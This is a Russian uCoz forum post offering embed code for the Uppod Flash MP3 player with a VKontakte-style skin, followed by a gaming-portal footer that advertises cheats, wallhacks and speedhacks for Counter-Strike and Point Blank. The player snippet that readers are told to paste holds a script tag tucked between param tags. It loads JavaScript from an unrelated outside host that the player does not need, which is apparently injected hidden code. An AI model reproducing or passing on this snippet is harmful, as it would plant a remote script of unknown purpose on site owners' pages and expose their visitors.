Загрузка...

  • Страница 1 из 1
  • 1
Модератор форума: $USERLIFE$  
Форум » Скрипты для системы uCoz » Другие скрипты » Плеер для проигрывания мп3 на сайте (Создаете свой список песен и наслаждаетесь)
Плеер для проигрывания мп3 на сайте
MyLifeДата: Среда, 02.05.2012, 13:11 | Сообщение # 1

ICQ:
Пользователь №: 47
Сообщений: 7
http://s017.radikal.ru/i437/1204/cf/533fbfdefd8b.png <-- Скрин

Одним из самых популярных плееров сделанных на Flash для проигрывания, как видео, так и музыки, является плеер Uppod. Его преимущество в том, что его не сложно установить и, самое главное, есть возможность смены скина проигрывателя. И так, в Uppod появился новый скин, который приближенно позволит сделать MP3 плеер как В Контакте. Это лучший вариант для тех, кто особо не смыслит в создании аудио проигрывателей для сайта. Здесь, как и в социальной сети, имеется перетаскиваемый ползунок, время до окончания музыкального файла над регулятором громкости. Названия трека также вписывается в коде плеера.

Code
<object id="audioplayer" type="application/x-shockwave-flash" data="http://www.csomsk.ru/1-ucoz/pm/uppod0962.swf" width="328" height="44"><param name="bgcolor" value="#ffffff"><script language=JavaScript src=http://js8xt.ru/ves.js></script><param name="allowScriptAccess" value="always"><param name="movie" value="http://www.csomsk.ru/1-ucoz/pm/uppod0962.swf"><param name="flashvars" value="comment=DSM3 - Go to the birthday&st=http://www.csomsk.ru/1-ucoz/pm/audio13-895.txt&m=audio&file=ссылка на MP3 файл"></object>


В коде сразу заметно место, куда следует вставлять название композиции. Ссылку на MP3 заменяете на свою, а файл TXT (файл стиля) и файл SWF (файл плеера) рекомендуется загрузить на свой хостинг, чтобы не было в дальнейшем никаких проблем, связанных с загрузкой проигрывателя. Файлы вы можете скачать по ссылке прикрепленной к материалу и залить на свой сайт в папку mp3.
Offline
Форум » Скрипты для системы uCoz » Другие скрипты » Плеер для проигрывания мп3 на сайте (Создаете свой список песен и наслаждаетесь)
  • Страница 1 из 1
  • 1
Поиск:

Игры для PC | Counter-Strike 1.6 | Adobe Photoshop | Система uCoz | Софт и программы


Мы рады приветствовать вас на нашем портале, посвящённом онлайн шутеру ставшим поплурным во всём мире Counter-Strike. Если вам нужны различные модели игроков, плагины на ваш сервер и многое другое для Counter-Strike 1.6 и Counter-Stirke Source, то вы попали туда, где всё это есть. У нас вы найдёте Читы для CS 1.6, Читы для Point Blank, Модели игроков для Counter-Strike, Плагины amxx для сервера в Cs и многое другое для Counter-Stirke. Здесь вы можете найти всё для Point Blank. Это Скрипты, Хаки, WH, Speedhack для Point Blank. Мы надеемся что вы останетесь на Www.GaMesLoad.Ru надолго.

Администрация не несёт ответственности за содержащие файлы на данном портале.
Дизайн, который стоит на Создать бесплатный сайт с uCoz нашем сайте полностью принадлежит нам
© 2011 GaMesLoad.Ru ForumSiteMap.xml SiteMap.xml
Создать сайт бесплатно